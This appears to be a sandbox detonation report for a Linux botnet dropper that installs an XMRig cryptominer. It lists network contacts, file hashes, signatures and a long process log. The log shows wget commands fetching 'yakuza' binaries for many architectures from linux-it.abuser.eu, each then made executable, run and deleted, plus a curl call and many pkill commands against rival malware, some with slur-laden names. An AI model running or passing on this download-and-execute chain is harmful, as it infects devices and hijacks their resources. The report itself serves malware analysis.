[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh

[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

/bin/sh

[sh -c pkill -9 onry0v03 || busybox pkill -9 onry0v03]

/usr/bin/pkill

[pkill -9 onry0v03]

/bin/busybox

[busybox pkill -9 onry0v03]

/bin/sh

[sh -c pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ]

/usr/bin/pkill

[pkill -9 FortniteDownLOLZ]

/bin/busybox

[busybox pkill -9 FortniteDownLOLZ]

/bin/sh

[sh -c pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay]

/usr/bin/pkill

[pkill -9 Y0urM0mGay]

/bin/busybox

[busybox pkill -9 Y0urM0mGay]

/bin/sh

[sh -c pkill -9 pussyfartlmaojk || busybox pkill -9 pussyfartlmaojk]

/usr/bin/pkill

[pkill -9 pussyfartlmaojk]

/bin/busybox

[busybox pkill -9 pussyfartlmaojk]

/bin/sh

[sh -c pkill -9 GrAcEnIgGeRaNn || busybox pkill -9 GrAcEnIgGeRaNn]

/usr/bin/pkill

[pkill -9 GrAcEnIgGeRaNn]

/bin/busybox

[busybox pkill -9 GrAcEnIgGeRaNn]

/bin/sh

[sh -c pkill -9 YvdGkqndCO || busybox pkill -9 YvdGkqndCO]

/usr/bin/pkill

[pkill -9 YvdGkqndCO]

/bin/busybox

[busybox pkill -9 YvdGkqndCO]

Network

Count Country Destination Domain Proto
15 US 1.1.1.1:53 linux-it.abuser.eu udp
14 IT 95.234.158.87:80 linux-it.abuser.eu tcp
25 IT 95.234.158.87:6780 linux-it.abuser.eu tcp
1 IT 95.234.158.87:21 linux-it.abuser.eu tcp
1 IT 95.234.158.87:10496 linux-it.abuser.eu tcp

Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

debian9-mipsel-20240611-en

Max time kernel

145s

Max time network

147s

Command Line

[/tmp/yak.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target Count
N/A N/A /bin/chmod N/A 14

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target Count
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A 63
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A 1

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/329/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A
File opened for reading /proc/700/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/700/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/cmdline /usr/bin/pkill N/A
File opened for reading /proc/119/status /usr/bin/pkill N/A
File opened for reading /proc/14/status /usr/bin/pkill N/A
File opened for reading /proc/326/status /usr/bin/pkill N/A
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/701/cmdline /usr/bin/pkill N/A
File opened for reading /proc/674/status /usr/bin/pkill N/A
File opened for reading /proc/74/cmdline /usr/bin/pkill N/A
File opened for reading /proc/335/status /usr/bin/pkill N/A
File opened for reading /proc/120/cmdline /usr/bin/pkill N/A
File opened for reading /proc/23/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/status /usr/bin/pkill N/A
File opened for reading /proc/381/status /usr/bin/pkill N/A
File opened for reading /proc/335/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/331/cmdline /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/status /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/78/cmdline /usr/bin/pkill N/A
File opened for reading /proc/84/cmdline /usr/bin/pkill N/A
File opened for reading /proc/16/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/77/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/381/status /usr/bin/pkill N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/331/status /usr/bin/pkill N/A
File opened for reading /proc/671/status /usr/bin/pkill N/A
File opened for reading /proc/741/status /usr/bin/pkill N/A
File opened for reading /proc/1182/status /usr/bin/pkill N/A
File opened for reading /proc/14/status /usr/bin/pkill N/A
File opened for reading /proc/740/status /usr/bin/pkill N/A
File opened for reading /proc/16/status /usr/bin/pkill N/A
File opened for reading /proc/702/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/329/cmdline /usr/bin/pkill N/A
File opened for reading /proc/76/status /usr/bin/pkill N/A
File opened for reading /proc/78/status /usr/bin/pkill N/A
File opened for reading /proc/666/status /usr/bin/pkill N/A
File opened for reading /proc/1082/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/112/status /usr/bin/pkill N/A
File opened for reading /proc/72/cmdline /usr/bin/pkill N/A
File opened for reading /proc/738/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/status /usr/bin/pkill N/A
File opened for reading /proc/381/status /usr/bin/pkill N/A
File opened for reading /proc/18/status /usr/bin/pkill N/A
File opened for reading /proc/947/status /usr/bin/pkill N/A
File opened for reading /proc/119/cmdline /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/696/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/pkill N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/usr/bin/pkill

[pkill -9 902i13]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm6]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/pkill

[pkill -9 scansh4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/chmod

[chmod +x yakuza.arm4]

/bin/busybox

[busybox pkill -9 flexsonskids]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/ps

[ps x]

/bin/grep

[grep xmrig]

/bin/grep

[grep -v grep]

/bin/grep

